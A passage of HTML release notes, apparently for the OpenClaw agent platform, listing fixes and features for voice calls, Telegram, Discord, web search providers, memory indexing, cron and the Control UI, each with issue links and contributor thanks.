<p>Voice Call: add <code>sessionScope: "per-call"</code> for fresh per-call agent memory while preserving the default per-phone caller history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072126400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45280/hovercard" href="https://github.com/openclaw/openclaw/issues/45280">#45280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pondcountry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pondcountry">@pondcountry</a>.</p>
</li>
<li>
<p>Music generation: raise too-small tool timeouts to the provider-safe 10-second floor and collapse cascading abort fallback errors into a clearer root-cause summary. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Memory-core/dreaming: include the primary runtime workspace in multi-agent dreaming sweeps without mixing main-agent session transcripts into configured subagent workspaces. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307075727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70014/hovercard" href="https://github.com/openclaw/openclaw/issues/70014">#70014</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ttomiczek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ttomiczek">@ttomiczek</a>.</p>
</li>
<li>
<p>Control UI: add tab/RPC timing attribution and decouple slow Overview/Cron secondary refreshes so Sessions navigation gets immediate visible feedback. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235854543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64004" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64004/hovercard" href="https://github.com/openclaw/openclaw/issues/64004">#64004</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WaMaSeDu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WaMaSeDu">@WaMaSeDu</a>.</p>
</li>
<li>
<p>Memory: retry transient SQLite index file swaps during atomic reindex on Windows, so brief <code>EBUSY</code>, <code>EPERM</code>, or <code>EACCES</code> locks do not fail memory rebuilds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237587612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64187" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64187/hovercard" href="https://github.com/openclaw/openclaw/issues/64187">#64187</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kunpeng-ai-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kunpeng-ai-lab">@kunpeng-ai-lab</a>.</p>
</li>
<li>
<p>Telegram/startup: use the existing <code>getMe</code> request guard for the gateway bot probe instead of a fixed 2.5-second budget, and honor higher <code>timeoutSeconds</code> configs for slow Telegram API paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366123141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75783/hovercard" href="https://github.com/openclaw/openclaw/issues/75783">#75783</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tankotan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tankotan">@tankotan</a>.</p>
</li>
<li>
<p>Telegram/models: make model picker confirmations say selections are session-scoped and do not change the agent's persistent default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368057405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75965" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75965/hovercard" href="https://github.com/openclaw/openclaw/issues/75965">#75965</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sd1114820/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sd1114820">@sd1114820</a>.</p>
</li>
<li>
<p>Control UI/slash commands: keep fallback command metadata on a browser-safe registry path, so provider thinking runtime imports cannot blank the Web UI with <code>process is not defined</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368284321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75987" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75987/hovercard" href="https://github.com/openclaw/openclaw/issues/75987">#75987</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/novkien/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/novkien">@novkien</a>.</p>
</li>
<li>
<p>Heartbeat/Discord: keep async exec completion events out of the generic <code>System (untrusted)</code> prompt block and let the dedicated exec heartbeat prompt handle them, so Discord no longer receives raw exec failure tails as separate system-style messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259713936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66366" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66366/hovercard" href="https://github.com/openclaw/openclaw/issues/66366">#66366</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Promee-ThaBossHoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Promee-ThaBossHoss">@Promee-ThaBossHoss</a>.</p>
</li>
<li>
<p>Channels: strip plain-text MiniMax and XML tool-call scaffolding from shared user-facing reply sanitization, so messaging channels do not deliver raw model tool syntax when a provider emits it as text instead of structured tool calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221535812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62820/hovercard" href="https://github.com/openclaw/openclaw/issues/62820">#62820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</p>
</li>
<li>
<p>Infer/media: report missing image-understanding and audio-transcription provider configuration for <code>image describe</code>, <code>image describe-many</code>, and <code>audio transcribe</code> instead of blaming the input path when no provider is available. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343347839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73569" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73569/hovercard" href="https://github.com/openclaw/openclaw/issues/73569">#73569</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343748623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73593/hovercard" href="https://github.com/openclaw/openclaw/pull/73593">#73593</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349938490" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74288/hovercard" href="https://github.com/openclaw/openclaw/pull/74288">#74288</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352412851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74495/hovercard" href="https://github.com/openclaw/openclaw/pull/74495">#74495</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tmimmanuel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tmimmanuel">@tmimmanuel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</p>
</li>
<li>
<p>Docs/health: clarify that session listing surfaces stored conversation rows rather than Discord/channel socket liveness, and point connectivity checks at channel status and health probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312712740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70420/hovercard" href="https://github.com/openclaw/openclaw/issues/70420">#70420</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ashersoutherncities-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ashersoutherncities-art">@ashersoutherncities-art</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>WhatsApp/Cron: keep DM pairing-store approvals out of implicit cron and heartbeat recipient fallback, so scheduled automation only uses explicit targets, active configured recipients, or configured <code>allowFrom</code> entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215965103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62339/hovercard" href="https://github.com/openclaw/openclaw/issues/62339">#62339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kelvinisly-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kelvinisly-collab">@kelvinisly-collab</a>.</p>
</li>
<li>
<p>Google Meet: keep the agent-facing <code>google_meet</code> tool visible on non-macOS hosts but block local Chrome realtime actions with guidance, so Linux agents can still use transcribe, Twilio, chrome-node, and artifact flows without choosing the macOS-only BlackHole path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367913692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75950/hovercard" href="https://github.com/openclaw/openclaw/issues/75950">#75950</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/actual-software-inc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/actual-software-inc">@actual-software-inc</a>.</p>
</li>
<li>
<p>macOS/settings: keep opening General from rewriting <code>openclaw.json</code> during Tailscale settings hydration, preserving <code>gateway</code>, <code>auth</code>, <code>meta</code>, and <code>wizard</code> until the user changes a setting. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4192663996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59545" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59545/hovercard" href="https://github.com/openclaw/openclaw/issues/59545">#59545</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tengdw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tengdw">@Tengdw</a>.</p>
</li>
<li>
<p>Discord: prioritize interaction callbacks ahead of stale background REST work without polling active REST buckets, validate oversized gateway payloads and member-intent requests before send, and forward explicit component payloads from message actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362439940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75363" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75363/hovercard" href="https://github.com/openclaw/openclaw/pull/75363">#75363</a>)</p>
</li>
<li>
<p>Active Memory: use the configured recall timeout as the blocking prompt-build hook budget by default and move cold-start setup grace behind explicit <code>setupGraceTimeoutMs</code> config, so the plugin no longer silently extends 15000 ms configs to 45000 ms on the main lane. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367042978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75843" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75843/hovercard" href="https://github.com/openclaw/openclaw/issues/75843">#75843</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</p>
</li>
<li>
<p>Plugins/web-provider: reuse the active gateway plugin registry for runtime web provider resolution after deriving the same candidate plugin ids as the loader path, avoiding a redundant <code>loadOpenClawPlugins</code> call on every request while preserving origin and scope filters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363428779" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75513/hovercard" href="https://github.com/openclaw/openclaw/issues/75513">#75513</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jochen">@jochen</a>.</p>
</li>
<li>
<p>Crestodian/CLI: exit non-zero when interactive Crestodian is invoked without a TTY, so scripts and CI no longer treat the setup error as success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344381793" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73646/hovercard" href="https://github.com/openclaw/openclaw/issues/73646">#73646</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347317157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73928" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73928/hovercard" href="https://github.com/openclaw/openclaw/pull/73928">#73928</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347801211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74059/hovercard" href="https://github.com/openclaw/openclaw/pull/74059">#74059</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</p>
</li>
<li>
<p>Cron: keep implicit/default isolated cron announce deliveries out of the main session awareness queue, so isolated jobs do not accumulate in the main conversation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208027555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61426/hovercard" href="https://github.com/openclaw/openclaw/issues/61426">#61426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lihannon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lihannon">@Lihannon</a>.</p>
</li>
<li>
<p>Subagents: avoid duplicate parent-visible replies when a parent uses <code>sessions_send</code> on its own persistent native subagent session, while preserving announce delivery for async sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342979045" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73550/hovercard" href="https://github.com/openclaw/openclaw/issues/73550">#73550</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sylviazhang2006-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sylviazhang2006-design">@sylviazhang2006-design</a>.</p>
</li>
<li>
<p>Web search/Brave: add opt-in <code>brave.http</code> diagnostics for Brave request URLs/query params, response status/timing, and cache hit/miss/write events without logging API keys or response bodies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144203570" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55196/hovercard" href="https://github.com/openclaw/openclaw/issues/55196">#55196</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mecampbellsoup/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mecampbellsoup">@mecampbellsoup</a>.</p>
</li>
<li>
<p>Web search/Brave: add <code>plugins.entries.brave.config.webSearch.baseUrl</code> for Brave-compatible proxies, including endpoint-aware cache keys for both web and LLM Context modes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3951923414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/19075" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/19075/hovercard" href="https://github.com/openclaw/openclaw/issues/19075">#19075</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkoprax/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkoprax">@jkoprax</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishnukool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishnukool">@vishnukool</a>.</p>
</li>
<li>
<p>Web search/config: validate explicit <code>tools.web.search.provider</code> values against bundled and installed plugin manifests, while warning for stale third-party plugin config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123070790" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53092/hovercard" href="https://github.com/openclaw/openclaw/issues/53092">#53092</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</p>
</li>
<li>
<p>Web search/SearXNG: retry empty non-general category searches once with the general category, so unsupported category engines do not return empty results when general search has matches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343014523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73552/hovercard" href="https://github.com/openclaw/openclaw/issues/73552">#73552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loukky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loukky">@Loukky</a>.</p>
</li>
<li>
<p>CLI/message: skip gateway-stop hooks for read-only <code>message read</code> and bound stop-hook shutdown for other message actions, so one-shot Discord reads cannot hang behind plugin lifecycle cleanup.</p>
</li>
<li>
<p>Plugins/web-provider: cache repeated bundled web search and web fetch provider registry loads by default while preserving explicit cache opt-outs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368302945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75992" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75992/hovercard" href="https://github.com/openclaw/openclaw/pull/75992">#75992</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Agents/sandbox: preserve existing workspace file modes when sandbox edits atomically replace files, so 0644 files do not collapse to 0600 after Write/Edit/apply_patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4064748597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44077" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44077/hovercard" href="https://github.com/openclaw/openclaw/issues/44077">#44077</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/patosullivan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/patosullivan">@patosullivan</a>.</p>
</li>
<li>
<p>Control UI/WebChat: route typed <code>/new</code> through the New Chat dashboard-session creation flow instead of <code>chat.send</code>, while keeping <code>/reset</code> as the explicit current-session reset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300356598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69599/hovercard" href="https://github.com/openclaw/openclaw/issues/69599">#69599</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</p>
</li>
<li>
<p>Agents/models: keep legacy CLI runtime model refs such as <code>claude-cli/*</code> in the configured allowlist after canonical runtime migration, so cron <code>payload.model</code> overrides keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365669096" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75753/hovercard" href="https://github.com/openclaw/openclaw/issues/75753">#75753</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyanSandoval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyanSandoval">@RyanSandoval</a>.</p>
</li>
<li>
<p>Codex/app-server: restart the shared Codex app-server client once when it closes during startup thread resume, preserving the existing thread binding instead of retrying <code>thread/start</code> on a closed client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/watch: keep colored subsystem log prefixes in the managed tmux pane even when the parent shell exports <code>NO_COLOR</code>, while preserving explicit <code>FORCE_COLOR=0</code> opt-out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Agents/compaction: submit a non-empty runtime-event marker for pre-compaction memory flush turns, so strict Anthropic providers no longer reject the silent flush as an empty user message. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361911066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75305" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75305/hovercard" href="https://github.com/openclaw/openclaw/issues/75305">#75305</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sableassistant3777-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sableassistant3777-source">@sableassistant3777-source</a>.</p>
</li>
<li>
<p>Plugin SDK: re-export <code>isPrivateIpAddress</code> from <code>plugin-sdk/ssrf-runtime</code>, restoring source-checkout builds for SearXNG and Firecrawl private-network guards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/message actions: advertise <code>upload-file</code> and route it through Discord's send runtime with agent-scoped media reads, so agents can discover and send file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203171087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60652/hovercard" href="https://github.com/openclaw/openclaw/issues/60652">#60652</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204560464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60808" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60808/hovercard" href="https://github.com/openclaw/openclaw/pull/60808">#60808</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206054244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61087" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61087/hovercard" href="https://github.com/openclaw/openclaw/pull/61087">#61087</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206088150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61100" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61100/hovercard" href="https://github.com/openclaw/openclaw/pull/61100">#61100</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claw-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claw-io">@claw-io</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelnishanth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelnishanth">@joelnishanth</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjhddh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjhddh">@sjhddh</a>.</p>
</li>
<li>
<p>Sessions: suppress exact inter-session control replies such as <code>NO_REPLY</code> and keep agent-to-agent announce bookkeeping out of visible transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123622416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53145" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53145/hovercard" href="https://github.com/openclaw/openclaw/issues/53145">#53145</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TarahAssistant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TarahAssistant">@TarahAssistant</a>.</p>
</li>
<li>
<p>CLI/directory: report unsupported directory operations for installed channel plugins instead of prompting to reinstall the plugin when it lacks a directory adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365917479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75770" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75770/hovercard" href="https://github.com/openclaw/openclaw/issues/75770">#75770</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lawong888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lawong888">@lawong888</a>.</p>
</li>
<li>
<p>Web search/SearXNG: show the JSON API <code>search.formats</code> prerequisite during SearXNG setup before prompting for the base URL. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250289649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65592" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65592/hovercard" href="https://github.com/openclaw/openclaw/pull/65592">#65592</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evanpaul14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evanpaul14">@evanpaul14</a>.</p>
</li>
<li>
<p>Web search/SearXNG: pass through <code>img_src</code> image URLs from SearXNG image-category results. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207995751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61416" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61416/hovercard" href="https://github.com/openclaw/openclaw/pull/61416">#61416</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sghael/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sghael">@sghael</a>.</p>
</li>
<li>
